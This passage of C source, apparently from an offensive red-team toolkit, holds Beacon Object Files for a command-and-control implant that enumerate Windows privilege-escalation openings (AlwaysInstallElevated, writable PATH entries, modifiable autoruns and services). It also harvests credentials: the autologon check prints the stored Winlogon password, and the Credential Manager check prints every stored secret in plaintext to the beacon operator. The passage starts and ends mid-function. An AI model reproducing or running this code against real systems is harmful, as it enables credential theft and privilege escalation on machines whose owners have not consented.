    const char* pszSubkeys[] = {
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
        "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
        "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
    };

    for (int i = 0; i < 2; i++) {
        for (int k = 0; k < 4; k++) {
            lResult = ADVAPI32$RegOpenKeyExA(hRoots[i], pszSubkeys[k], 0, KEY_READ, &hKey);
            if (lResult != ERROR_SUCCESS) {
                continue;
            }

            dwIndex = 0;
            while (1) {
                dwValueNameSize = sizeof(szValueName);
                dwValueDataSize = sizeof(szValueData);

                lResult = ADVAPI32$RegEnumValueA(hKey, dwIndex, szValueName, &dwValueNameSize,
                    NULL, &dwType, (LPBYTE)szValueData, &dwValueDataSize);

                if (lResult != ERROR_SUCCESS) {
                    break;
                }

                if (dwType == REG_SZ || dwType == REG_EXPAND_SZ) {
                    szValueData[dwValueDataSize] = '\0';

                    p = 0;
                    q = 0;

                    while (szValueData[p] == ' ') p++;

                    if (szValueData[p] == '"') {
                        p++;
                        while (szValueData[p] != '\0' && szValueData[p] != '"' && q < 510) {
                            szPath[q++] = szValueData[p++];
                        }
                    } else {
                        while (szValueData[p] != '\0' && szValueData[p] != ' ' && q < 510) {
                            szPath[q++] = szValueData[p++];
                        }
                    }
                    szPath[q] = '\0';

                    hFile = KERNEL32$CreateFileA(szPath, GENERIC_WRITE,
                        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING,
                        FILE_ATTRIBUTE_NORMAL, NULL);

                    if (hFile != INVALID_HANDLE_VALUE) {
                        KERNEL32$CloseHandle(hFile);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] WRITABLE: %s\\%s\n", pszHives[i], pszSubkeys[k]);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN]   Name: %s\n", szValueName);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN]   Path: %s\n", szValueData);
                        nFound++;
                    }
                }

                dwIndex++;
            }

            ADVAPI32$RegCloseKey(hKey);
            hKey = NULL;
        }
    }

    if (nFound > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] VULNERABLE: %d modifiable autorun(s) found!\n", nFound);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] Not vulnerable: No modifiable autoruns found\n");
    }
}


================================================
FILE: SAL-BOF/privcheck/modifiablesvc.c
================================================
#include <windows.h>
#include <stdio.h>
#include "beacon.h"
#include "bofdefs.h"

BOOL HasModifyRights(ACCESS_MASK mask) {
    if (mask & SERVICE_CHANGE_CONFIG)  return TRUE;
    if (mask & WRITE_DAC)              return TRUE;
    if (mask & WRITE_OWNER)            return TRUE;
    if (mask & GENERIC_ALL)            return TRUE;
    if (mask & GENERIC_WRITE)          return TRUE;
    if (mask & SERVICE_ALL_ACCESS)     return TRUE;
    return FALSE;
}

void go() {
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    HANDLE hToken = NULL;
    HANDLE hHeap = NULL;
    LPBYTE pServices = NULL;
    LPENUM_SERVICE_STATUS_PROCESSA pServiceStatus = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    LPQUERY_SERVICE_CONFIGA pConfig = NULL;
    PTOKEN_USER pTokenUser = NULL;
    DWORD dwBytesNeeded = 0;
    DWORD dwServicesReturned = 0;
    DWORD dwResumeHandle = 0;
    DWORD dwBufferSize = 0;
    DWORD dwSDSize = 0;
    DWORD dwConfigSize = 0;
    DWORD dwTokenInfoSize = 0;
    int nVulnerable = 0;
    BOOL bDaclPresent = FALSE;
    BOOL bDaclDefaulted = FALSE;
    PACL pDacl = NULL;

    hHeap = KERNEL32$GetProcessHeap();

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to open process token. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    ADVAPI32$GetTokenInformation(hToken, TokenUser, NULL, 0, &dwTokenInfoSize);
    pTokenUser = (PTOKEN_USER)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwTokenInfoSize);
    if (!pTokenUser) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Memory allocation failed\n");
        goto cleanup;
    }

    if (!ADVAPI32$GetTokenInformation(hToken, TokenUser, pTokenUser, dwTokenInfoSize, &dwTokenInfoSize)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to get token user. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

    hSCManager = ADVAPI32$OpenSCManagerA(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!hSCManager) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to open Service Control Manager. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

    ADVAPI32$EnumServicesStatusExA(hSCManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32,
        SERVICE_STATE_ALL, NULL, 0, &dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL);

    dwBufferSize = dwBytesNeeded;
    pServices = (LPBYTE)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwBufferSize);
    if (!pServices) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Memory allocation failed\n");
        goto cleanup;
    }

    dwResumeHandle = 0;
    if (!ADVAPI32$EnumServicesStatusExA(hSCManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32,
        SERVICE_STATE_ALL, pServices, dwBufferSize, &dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to enumerate services. Error: %lu\n", KERNEL32$GetLastError());
        goto cleanup;
    }

    pServiceStatus = (LPENUM_SERVICE_STATUS_PROCESSA)pServices;

    for (DWORD i = 0; i < dwServicesReturned; i++) {
        hService = ADVAPI32$OpenServiceA(hSCManager, pServiceStatus[i].lpServiceName, READ_CONTROL | SERVICE_QUERY_CONFIG);
        if (!hService) continue;

        dwSDSize = 0;
        ADVAPI32$QueryServiceObjectSecurity(hService, DACL_SECURITY_INFORMATION, NULL, 0, &dwSDSize);
        if (dwSDSize == 0) {
            ADVAPI32$CloseServiceHandle(hService);
            hService = NULL;
            continue;
        }

        pSD = (PSECURITY_DESCRIPTOR)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwSDSize);
        if (!pSD) {
            ADVAPI32$CloseServiceHandle(hService);
            hService = NULL;
            continue;
        }

        if (!ADVAPI32$QueryServiceObjectSecurity(hService, DACL_SECURITY_INFORMATION, pSD, dwSDSize, &dwSDSize)) {
            KERNEL32$HeapFree(hHeap, 0, pSD);
            pSD = NULL;
            ADVAPI32$CloseServiceHandle(hService);
            hService = NULL;
            continue;
        }

        pDacl = NULL;
        if (!ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted) || !bDaclPresent || !pDacl) {
            KERNEL32$HeapFree(hHeap, 0, pSD);
            pSD = NULL;
            ADVAPI32$CloseServiceHandle(hService);
            hService = NULL;
            continue;
        }

        for (DWORD j = 0; j < pDacl->AceCount; j++) {
            PACE_HEADER pAceHeader = NULL;
            if (!ADVAPI32$GetAce(pDacl, j, (LPVOID*)&pAceHeader)) continue;
            if (pAceHeader->AceType != ACCESS_ALLOWED_ACE_TYPE) continue;

            PACCESS_ALLOWED_ACE pAce = (PACCESS_ALLOWED_ACE)pAceHeader;
            PSID pAceSid = (PSID)&pAce->SidStart;

            if (!HasModifyRights(pAce->Mask)) continue;

            BOOL bMatch = FALSE;
            if (ADVAPI32$EqualSid(pAceSid, pTokenUser->User.Sid)) {
                bMatch = TRUE;
            } else {
                ADVAPI32$CheckTokenMembership(hToken, pAceSid, &bMatch);
            }

            if (bMatch) {
                dwConfigSize = 0;
                ADVAPI32$QueryServiceConfigA(hService, NULL, 0, &dwConfigSize);
                if (dwConfigSize > 0) {
                    pConfig = (LPQUERY_SERVICE_CONFIGA)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwConfigSize);
                    if (pConfig && ADVAPI32$QueryServiceConfigA(hService, pConfig, dwConfigSize, &dwConfigSize)) {
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] VULNERABLE: %s\n", pServiceStatus[i].lpServiceName);
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC]   Display: %s\n", pConfig->lpDisplayName ? pConfig->lpDisplayName : "N/A");
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC]   Binary:  %s\n", pConfig->lpBinaryPathName ? pConfig->lpBinaryPathName : "N/A");
                        nVulnerable++;
                    }
                    if (pConfig) {
                        KERNEL32$HeapFree(hHeap, 0, pConfig);
                        pConfig = NULL;
                    }
                }
                break;
            }
        }

        KERNEL32$HeapFree(hHeap, 0, pSD);
        pSD = NULL;
        ADVAPI32$CloseServiceHandle(hService);
        hService = NULL;
    }

    if (nVulnerable > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Found %d modifiable service(s)!\n", nVulnerable);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] No modifiable services found\n");
    }

cleanup:
    if (pConfig) KERNEL32$HeapFree(hHeap, 0, pConfig);
    if (pSD) KERNEL32$HeapFree(hHeap, 0, pSD);
    if (pServices) KERNEL32$HeapFree(hHeap, 0, pServices);
    if (pTokenUser) KERNEL32$HeapFree(hHeap, 0, pTokenUser);
    if (hService) ADVAPI32$CloseServiceHandle(hService);
    if (hSCManager) ADVAPI32$CloseServiceHandle(hSCManager);
    if (hToken) KERNEL32$CloseHandle(hToken);
}


================================================
FILE: SAL-BOF/privcheck/privcheck_all.c
================================================
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include <shlwapi.h>
#include <wincrypt.h>
#include <wincred.h>
#include <processthreadsapi.h>
#include "bofdefs.h"
#include "beacon.h"
#include "vulndrivers.h"

#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0]))
#define BUFSIZE     1024
#define SHA256LEN   32
#define SHA1LEN     20
#define MD5LEN      16

/* ============================================================
 * CHECK: AlwaysInstallElevated
 * ============================================================ */
void CheckAlwaysInstallElevated() {
    HKEY hKey;
    DWORD alwaysInstallElevated = 0;
    DWORD bufferSize = sizeof(DWORD);
    const TCHAR* subkeys[] = {
        TEXT("HKEY_CURRENT_USER"),
        TEXT("HKEY_LOCAL_MACHINE")
    };

    BeaconPrintf(CALLBACK_OUTPUT, "=== AlwaysInstallElevated Check ===\n");

    for (int i = 0; i < ARRAY_SIZE(subkeys); i++) {
        if (ADVAPI32$RegOpenKeyExA((i == 0) ? HKEY_CURRENT_USER : HKEY_LOCAL_MACHINE,
            TEXT("Software\\Policies\\Microsoft\\Windows\\Installer"),
            0, KEY_QUERY_VALUE, &hKey) == ERROR_SUCCESS) {

            if (ADVAPI32$RegQueryValueExA(hKey, TEXT("AlwaysInstallElevated"),
                NULL, NULL, (LPBYTE)&alwaysInstallElevated, &bufferSize) == ERROR_SUCCESS) {
                if (alwaysInstallElevated == 1) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Always Install Elevated Check Result: Vulnerable\n", subkeys[i]);
                } else {
                    BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Always Install Elevated Check Result: Not Vulnerable\n", subkeys[i]);
                }
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Unable to query AlwaysInstallElevated value.\n", subkeys[i]);
            }
            ADVAPI32$RegCloseKey(hKey);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[ALWAYS_INSTALL_ELEVATED][%s] Registry key for AlwaysInstallElevated does not seem to exist.\n", subkeys[i]);
        }
    }
}

/* ============================================================
 * CHECK: Autologon
 * ============================================================ */
void CheckAutologon() {
    HKEY hKey = NULL;
    DWORD dwSize = 0;
    DWORD dwType = 0;
    char szAutoLogon[16] = {0};
    char szUserName[256] = {0};
    char szDomain[256] = {0};
    char szPassword[256] = {0};
    BOOL bAutoLogonFound = FALSE;
    BOOL bUserNameFound = FALSE;
    BOOL bDomainFound = FALSE;
    BOOL bPasswordFound = FALSE;
    LONG lResult = 0;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Autologon Check ===\n");

    lResult = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,
        "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", 0, KEY_READ, &hKey);
    if (lResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] Failed to open Winlogon registry key (error: 0x%lX)\n", lResult);
        return;
    }

    dwSize = sizeof(szAutoLogon);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "AutoAdminLogon", NULL, &dwType, (LPBYTE)szAutoLogon, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon: %s\n", szAutoLogon);
        bAutoLogonFound = TRUE;
    }

    dwSize = sizeof(szDomain);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultDomainName", NULL, &dwType, (LPBYTE)szDomain, &dwSize);
    if (lResult == ERROR_SUCCESS && szDomain[0] != '\0') {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultDomainName: %s\n", szDomain);
        bDomainFound = TRUE;
    }

    dwSize = sizeof(szUserName);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultUserName", NULL, &dwType, (LPBYTE)szUserName, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultUserName: %s\n", szUserName);
        bUserNameFound = TRUE;
    }

    dwSize = sizeof(szPassword);
    lResult = ADVAPI32$RegQueryValueExA(hKey, "DefaultPassword", NULL, &dwType, (LPBYTE)szPassword, &dwSize);
    if (lResult == ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultPassword: %s\n", szPassword);
        bPasswordFound = TRUE;
    }

    if (!bAutoLogonFound) BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon: Not Found\n");
    if (!bUserNameFound)  BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultUserName: Not Found\n");
    if (!bPasswordFound)  BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] DefaultPassword: Not Found\n");

    if (bAutoLogonFound && szAutoLogon[0] == '1' && bPasswordFound) {
        if (bDomainFound) {
            BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] VULNERABLE: Autologon credentials stored: %s\\%s:%s\n", szDomain, szUserName, szPassword);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] VULNERABLE: Autologon credentials stored: %s:%s\n", szUserName, szPassword);
        }
    } else if (bAutoLogonFound && szAutoLogon[0] == '1') {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] AutoAdminLogon enabled but no DefaultPassword found.\n");
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTOLOGON] Not vulnerable: Autologon not enabled or no credentials stored\n");
    }

    ADVAPI32$RegCloseKey(hKey);
}

/* ============================================================
 * CHECK: CredentialManager
 * ============================================================ */
void CheckCredentialManager() {
    DWORD dwCount = 0;
    PCREDENTIALA *pCredentials = NULL;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Credential Manager Check ===\n");

    if (!ADVAPI32$CredEnumerateA(NULL, 0, &dwCount, &pCredentials)) {
        DWORD dwErr = KERNEL32$GetLastError();
        if (dwErr == ERROR_NOT_FOUND) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] No credentials found in Credential Manager\n");
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] Error enumerating credentials: 0x%lX\n", dwErr);
        }
        return;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] Found %lu credential(s)\n", dwCount);
    for (DWORD i = 0; i < dwCount; i++) {
        BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER] --- Credential [%lu] ---\n", i + 1);
        if (pCredentials[i]->TargetName != NULL)
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Target: %s\n", pCredentials[i]->TargetName);
        if (pCredentials[i]->UserName != NULL)
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   User:   %s\n", pCredentials[i]->UserName);
        if (pCredentials[i]->CredentialBlobSize > 0 && pCredentials[i]->CredentialBlob != NULL) {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Secret: %.*s\n",
                pCredentials[i]->CredentialBlobSize, (char*)pCredentials[i]->CredentialBlob);
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[CREDMANAGER]   Secret: <empty or protected>\n");
        }
    }
    ADVAPI32$CredFree(pCredentials);
}

/* ============================================================
 * CHECK: HijackablePath
 * ============================================================ */
void CheckHijackablePath() {
    HKEY hKey;
    LONG openResult;
    LONG queryResult;
    DWORD valueType;
    char data[1024];
    DWORD dataSize = sizeof(data);
    DWORD len;
    HANDLE hToken, hImpersonatedToken;
    DWORD GenericAccess = FILE_ADD_FILE;
    int NumOfWritablePaths = 0;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Hijackable Path Check ===\n");

    openResult = ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE,
        "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", 0, KEY_READ, &hKey);
    if (openResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[WRITABLE_PATH] Error opening registry key: %d\n", openResult);
        return;
    }

    queryResult = ADVAPI32$RegQueryValueExA(hKey, "Path", NULL, &valueType, (LPBYTE)data, &dataSize);
    if (queryResult != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[WRITABLE_PATH] Error querying registry value: %d\n", queryResult);
        ADVAPI32$RegCloseKey(hKey);
        return;
    }

    char* pathToken = MSVCRT$strtok(data, ";");
    while (pathToken != NULL) {
        DWORD attributes = KERNEL32$GetFileAttributesA(pathToken);
        if (attributes != INVALID_FILE_ATTRIBUTES && (attributes & FILE_ATTRIBUTE_DIRECTORY)) {
            if (!ADVAPI32$GetFileSecurityA(pathToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL, 0, &len) && ERROR_INSUFFICIENT_BUFFER == KERNEL32$GetLastError()) {
                PSECURITY_DESCRIPTOR security = MSVCRT$malloc(len);
                if (security && ADVAPI32$GetFileSecurityA(pathToken, OWNER_SECURITY_INFORMATION | GROUP_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, security, len, &len)) {
                    if (ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_IMPERSONATE | TOKEN_QUERY | TOKEN_DUPLICATE | STANDARD_RIGHTS_READ, &hToken)) {
                        if (ADVAPI32$DuplicateToken(hToken, SecurityImpersonation, &hImpersonatedToken)) {
                            GENERIC_MAPPING mapping = { FILE_GENERIC_READ, FILE_GENERIC_WRITE, FILE_GENERIC_EXECUTE, FILE_ALL_ACCESS };
                            PRIVILEGE_SET privileges = { 0 };
                            DWORD grantedAccess = 0, privilegesLength = sizeof(privileges);
                            BOOL result = FALSE;
                            if (ADVAPI32$AccessCheck(security, hImpersonatedToken, GenericAccess, &mapping, &privileges, &privilegesLength, &grantedAccess, &result)) {
                                if (result) {
                                    BeaconPrintf(CALLBACK_OUTPUT, "[WRITABLE_PATH] Found writable directory in PATH: %s\n", pathToken);
                                    NumOfWritablePaths++;
                                }
                            }
                            KERNEL32$CloseHandle(hImpersonatedToken);
                        }
                        KERNEL32$CloseHandle(hToken);
                    }
                    MSVCRT$free(security);
                }
            }
        }
        pathToken = MSVCRT$strtok(NULL, ";");
    }
    ADVAPI32$RegCloseKey(hKey);
    BeaconPrintf(CALLBACK_OUTPUT, "[WRITABLE_PATH] Found %d writable directories in PATH\n", NumOfWritablePaths);
}

/* ============================================================
 * CHECK: ModifiableAutorun
 * ============================================================ */
void CheckModifiableAutorun() {
    HKEY hKey = NULL;
    LONG lResult = 0;
    char szValueName[256];
    char szValueData[512];
    char szPath[512];
    DWORD dwValueNameSize, dwValueDataSize, dwType, dwIndex;
    int nFound = 0;
    int p, q;
    HANDLE hFile;

    const char* pszHives[] = { "HKLM", "HKCU" };
    HKEY hRoots[] = { HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER };
    const char* pszSubkeys[] = {
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",
        "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
        "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run",
        "SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
    };

    BeaconPrintf(CALLBACK_OUTPUT, "=== Modifiable Autorun Check ===\n");

    for (int i = 0; i < 2; i++) {
        for (int k = 0; k < 4; k++) {
            lResult = ADVAPI32$RegOpenKeyExA(hRoots[i], pszSubkeys[k], 0, KEY_READ, &hKey);
            if (lResult != ERROR_SUCCESS) continue;

            dwIndex = 0;
            while (1) {
                dwValueNameSize = sizeof(szValueName);
                dwValueDataSize = sizeof(szValueData);
                lResult = ADVAPI32$RegEnumValueA(hKey, dwIndex, szValueName, &dwValueNameSize,
                    NULL, &dwType, (LPBYTE)szValueData, &dwValueDataSize);
                if (lResult != ERROR_SUCCESS) break;

                if (dwType == REG_SZ || dwType == REG_EXPAND_SZ) {
                    szValueData[dwValueDataSize] = '\0';
                    p = 0; q = 0;
                    while (szValueData[p] == ' ') p++;
                    if (szValueData[p] == '"') {
                        p++;
                        while (szValueData[p] != '\0' && szValueData[p] != '"' && q < 510) szPath[q++] = szValueData[p++];
                    } else {
                        while (szValueData[p] != '\0' && szValueData[p] != ' ' && q < 510) szPath[q++] = szValueData[p++];
                    }
                    szPath[q] = '\0';

                    hFile = KERNEL32$CreateFileA(szPath, GENERIC_WRITE,
                        FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
                    if (hFile != INVALID_HANDLE_VALUE) {
                        KERNEL32$CloseHandle(hFile);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] WRITABLE: %s\\%s\n", pszHives[i], pszSubkeys[k]);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN]   Name: %s\n", szValueName);
                        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN]   Path: %s\n", szValueData);
                        nFound++;
                    }
                }
                dwIndex++;
            }
            ADVAPI32$RegCloseKey(hKey);
            hKey = NULL;
        }
    }

    if (nFound > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] VULNERABLE: %d modifiable autorun(s) found!\n", nFound);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[AUTORUN] Not vulnerable: No modifiable autoruns found\n");
    }
}

/* ============================================================
 * CHECK: ModifiableService
 * ============================================================ */
static BOOL HasModifyRights(ACCESS_MASK mask) {
    if (mask & SERVICE_CHANGE_CONFIG)  return TRUE;
    if (mask & WRITE_DAC)              return TRUE;
    if (mask & WRITE_OWNER)            return TRUE;
    if (mask & GENERIC_ALL)            return TRUE;
    if (mask & GENERIC_WRITE)          return TRUE;
    if (mask & SERVICE_ALL_ACCESS)     return TRUE;
    return FALSE;
}

void CheckModifiableService() {
    SC_HANDLE hSCManager = NULL;
    SC_HANDLE hService = NULL;
    HANDLE hToken = NULL;
    HANDLE hHeap = NULL;
    LPBYTE pServices = NULL;
    LPENUM_SERVICE_STATUS_PROCESSA pServiceStatus = NULL;
    PSECURITY_DESCRIPTOR pSD = NULL;
    LPQUERY_SERVICE_CONFIGA pConfig = NULL;
    PTOKEN_USER pTokenUser = NULL;
    DWORD dwBytesNeeded = 0, dwServicesReturned = 0, dwResumeHandle = 0;
    DWORD dwBufferSize = 0, dwSDSize = 0, dwConfigSize = 0, dwTokenInfoSize = 0;
    int nVulnerable = 0;
    BOOL bDaclPresent = FALSE, bDaclDefaulted = FALSE;
    PACL pDacl = NULL;

    BeaconPrintf(CALLBACK_OUTPUT, "=== Modifiable Service Check ===\n");

    hHeap = KERNEL32$GetProcessHeap();

    if (!ADVAPI32$OpenProcessToken(KERNEL32$GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to open process token. Error: %lu\n", KERNEL32$GetLastError());
        return;
    }

    ADVAPI32$GetTokenInformation(hToken, TokenUser, NULL, 0, &dwTokenInfoSize);
    pTokenUser = (PTOKEN_USER)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwTokenInfoSize);
    if (!pTokenUser || !ADVAPI32$GetTokenInformation(hToken, TokenUser, pTokenUser, dwTokenInfoSize, &dwTokenInfoSize)) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to get token user\n");
        goto modsvc_cleanup;
    }

    hSCManager = ADVAPI32$OpenSCManagerA(NULL, NULL, SC_MANAGER_ENUMERATE_SERVICE);
    if (!hSCManager) {
        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] Failed to open SCM. Error: %lu\n", KERNEL32$GetLastError());
        goto modsvc_cleanup;
    }

    ADVAPI32$EnumServicesStatusExA(hSCManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32,
        SERVICE_STATE_ALL, NULL, 0, &dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL);
    dwBufferSize = dwBytesNeeded;
    pServices = (LPBYTE)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwBufferSize);
    if (!pServices) goto modsvc_cleanup;

    dwResumeHandle = 0;
    if (!ADVAPI32$EnumServicesStatusExA(hSCManager, SC_ENUM_PROCESS_INFO, SERVICE_WIN32,
        SERVICE_STATE_ALL, pServices, dwBufferSize, &dwBytesNeeded, &dwServicesReturned, &dwResumeHandle, NULL)) {
        goto modsvc_cleanup;
    }

    pServiceStatus = (LPENUM_SERVICE_STATUS_PROCESSA)pServices;

    for (DWORD i = 0; i < dwServicesReturned; i++) {
        hService = ADVAPI32$OpenServiceA(hSCManager, pServiceStatus[i].lpServiceName, READ_CONTROL | SERVICE_QUERY_CONFIG);
        if (!hService) continue;

        dwSDSize = 0;
        ADVAPI32$QueryServiceObjectSecurity(hService, DACL_SECURITY_INFORMATION, NULL, 0, &dwSDSize);
        if (dwSDSize == 0) { ADVAPI32$CloseServiceHandle(hService); hService = NULL; continue; }

        pSD = (PSECURITY_DESCRIPTOR)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwSDSize);
        if (!pSD || !ADVAPI32$QueryServiceObjectSecurity(hService, DACL_SECURITY_INFORMATION, pSD, dwSDSize, &dwSDSize)) {
            if (pSD) { KERNEL32$HeapFree(hHeap, 0, pSD); pSD = NULL; }
            ADVAPI32$CloseServiceHandle(hService); hService = NULL; continue;
        }

        pDacl = NULL;
        if (!ADVAPI32$GetSecurityDescriptorDacl(pSD, &bDaclPresent, &pDacl, &bDaclDefaulted) || !bDaclPresent || !pDacl) {
            KERNEL32$HeapFree(hHeap, 0, pSD); pSD = NULL;
            ADVAPI32$CloseServiceHandle(hService); hService = NULL; continue;
        }

        for (DWORD j = 0; j < pDacl->AceCount; j++) {
            PACE_HEADER pAceHeader = NULL;
            if (!ADVAPI32$GetAce(pDacl, j, (LPVOID*)&pAceHeader)) continue;
            if (pAceHeader->AceType != ACCESS_ALLOWED_ACE_TYPE) continue;
            PACCESS_ALLOWED_ACE pAce = (PACCESS_ALLOWED_ACE)pAceHeader;
            PSID pAceSid = (PSID)&pAce->SidStart;
            if (!HasModifyRights(pAce->Mask)) continue;

            BOOL bMatch = FALSE;
            if (ADVAPI32$EqualSid(pAceSid, pTokenUser->User.Sid)) bMatch = TRUE;
            else ADVAPI32$CheckTokenMembership(hToken, pAceSid, &bMatch);

            if (bMatch) {
                dwConfigSize = 0;
                ADVAPI32$QueryServiceConfigA(hService, NULL, 0, &dwConfigSize);
                if (dwConfigSize > 0) {
                    pConfig = (LPQUERY_SERVICE_CONFIGA)KERNEL32$HeapAlloc(hHeap, HEAP_ZERO_MEMORY, dwConfigSize);
                    if (pConfig && ADVAPI32$QueryServiceConfigA(hService, pConfig, dwConfigSize, &dwConfigSize)) {
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC] VULNERABLE: %s\n", pServiceStatus[i].lpServiceName);
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC]   Display: %s\n", pConfig->lpDisplayName ? pConfig->lpDisplayName : "N/A");
                        BeaconPrintf(CALLBACK_OUTPUT, "[MODSVC]   Binary:  %s\n", pConfig->lpBinaryPathName ? pConfig->lpBinaryPathName : "N/A");
                        nVulnerable++;
                    }
                    if (pConfig) { KERNEL32$HeapFree(hHeap, 0, pConfig); pConfig = NULL; }
                }
                break;
            }
        }
        KERNEL32$HeapFree(hHeap, 0, pSD); pSD = NULL;
        ADVAPI32$CloseServiceHandle(hService); hService = NULL;
    }

